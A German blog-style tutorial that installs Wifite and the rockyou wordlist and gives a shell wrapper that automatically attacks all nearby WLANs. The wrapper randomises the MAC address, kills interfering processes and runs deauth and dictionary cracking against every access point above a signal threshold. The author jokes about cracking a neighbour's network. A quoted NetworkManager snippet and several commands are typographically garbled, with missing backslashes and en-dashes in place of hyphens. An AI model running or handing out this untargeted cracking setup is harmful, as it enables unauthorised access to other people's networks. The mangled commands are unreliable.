Wifite ist ein Tool zur Automatisierung von WLAN‑Audits. Es ist darauf ausgelegt, alle bekannten Methoden zu nutzen, um das Passwort eines WLAN‑Access‑Points (Routers) zu erlangen.
Dabei kombiniert es verschiedene Angriffstechniken aus der Aircrack‑NG Suite und weiteren Tools.
Unterstützte Einstiegspunkte sind: WPS, WPA, WEP. Also alles Gängige.
Zum einen kann man damit leicht sein eigenes WLAN testen, zum anderen hat im Forum - vor Jahren - mal jemand geschrieben, er dürfe das WLAN seines Nachbarn nutzen, wenn er die Zugriffsdaten herausbekommt … in dem Sinne - Have Fun.
Installation von Wifite und rockyou.txt
Wifite und Wörterbücher für Brute‑Force können in Kali über die Paketverwaltung installiert werden:
apt-get –install-suggests install wordlists wifite gunzip –keep /usr/share/wordlists/rockyou.txt.gz
Angriff starten
Für den Start habe ich mir einen Wrapper geschrieben, der Wifite aufruft und automatisch damit beginnt, WLANs zu finden und das Passwort zu erraten oder zu knacken.
cat <<! >~/bin/wifite-wrapper #!/usr/bin/env sh # Wifite wrapper (WLAN-hacking) # Usage: wifite-wrapper [ -i interface ] # wireless interface for capturing (default: auto) sudo wifite –daemon –kill –random-mac –dict /usr/share/wordlists/rockyou.txt –power 30 -p 900 ”$@” ! chmod +x ~/bin/wifite-wrapper ~/bin/wifite-wrapper
Erklärung der verwendeten Parameter:
–daemon: Setzt das Interface nach beenden von Wifite vom monitor mode zurück in den managed mode–kill: Beendet Prozesse, die Airmon/Airodump stören–random-mac: Zufällige MAC‑Adresse–dict <file>: Wörterbuch für Brute-Force–power <db>: Nur Ziele mit Signalstärke größer alsdbangreifen-p <s>: „Pillage“ – greift nachsSekunden alle Ziele an
Optional:
-i <interface>: WLAN‑Interface (Standard: auto)–nodeauths: Passiver Modus, keine Deauth‑Pakete
Hinweis: Bei –nodeauths sollte -p auf einen hohen Wert gesetzt werden (z. B. mehrere Stunden).
Signalstärke‑Anzeige (NetworkManager)
Der folgende Code zeigt, wie NetworkManager die grafischen WLAN‑Balken generiert:
cd /tmp/
apt-get source network-manager
cat network-manager-1.56.1/src/libnmc-base/nm-client-utils.c
[…]
/**
* nmc_wifi_strength_bars:
* @strength: the access point strength, from 0 to 100
*
* Converts @strength into a 4-character-wide graphical representation of
* strength suitable for printing to stdout. If the current locale and terminal
* support it, this will use unicode graphics characters to represent
* ”bars”. Otherwise, it will use 0 to 4 asterisks.
*
* Returns: the graphical representation of the access point strength
*/
const char *
nmc_wifi_strength_bars(guint8 strength)
{
[…]
if (strength > 80)
return /* ▂▄▆█ */ ”342226202342226204342226206342226210”;
else if (strength > 55)
return /* ▂▄▆_ */ ”342226202342226204342226206_”;
else if (strength > 30)
return /* ▂▄__ */ ”342226202342226204__”;
else if (strength > 5)
return /* ▂___ */ ”342226202___”;
else
return /* ____ */ ”____”;
}
[…]
